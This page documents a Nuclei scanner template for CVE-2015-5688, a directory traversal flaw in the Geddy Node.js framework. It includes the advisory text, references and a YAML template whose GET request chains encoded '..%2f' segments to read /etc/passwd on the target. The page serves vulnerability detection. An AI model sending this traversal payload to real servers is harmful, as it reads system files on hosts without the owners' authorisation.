Geddy <13.0.8 - Local File Inclusion
ID: CVE-2015-5688
Severity: medium
Author: pikpikcu
Tags: cve2015,cve,geddy,lfi,geddyjs,node.js
Description
Section titled “Description”Geddy prior to version 13.0.8 contains a directory traversal vulnerability in lib/app/index.js that allows remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the PATH_INFO to the default URI.
YAML Source
Section titled “YAML Source”id: CVE-2015-5688
info: name: Geddy <13.0.8 - Local File Inclusion author: pikpikcu severity: medium description: Geddy prior to version 13.0.8 contains a directory traversal vulnerability in lib/app/index.js that allows remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the PATH_INFO to the default URI. impact: | The vulnerability can be exploited to read sensitive files, execute arbitrary code, or gain unauthorized access to the system. remediation: | Upgrade Geddy to version 13.0.8 or later to mitigate the vulnerability. reference: - https://nodesecurity.io/advisories/geddy-directory-traversal - https://github.com/geddy/geddy/issues/697 - https://github.com/geddy/geddy/commit/2de63b68b3aa6c08848f261ace550a37959ef231 - https://nvd.nist.gov/vuln/detail/CVE-2015-5688 - https://github.com/geddy/geddy/pull/699 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2015-5688 cwe-id: CWE-22 epss-score: 0.01347 epss-percentile: 0.86101 cpe: cpe:2.3:a:geddyjs:geddy:13.0.7:*:*:*:*:node.js:*:* metadata: max-request: 1 vendor: geddyjs product: geddy framework: node.js tags: cve2015,cve,geddy,lfi,geddyjs,node.js
http: - method: GET path: - "{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"
matchers-condition: and matchers: - type: regex part: body regex: - "root:.*:0:0:"
- type: status status: - 200# digest: 4b0a00483046022100f0d6d619fb99e3946b834a408e762941d55c3c1bbb77f2fce0812e79e80c0aef022100a28777c42683fddfbae774d953cb3c376a117dc2337ecb7a5d6109b20d75eec6:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2015/CVE-2015-5688.yaml"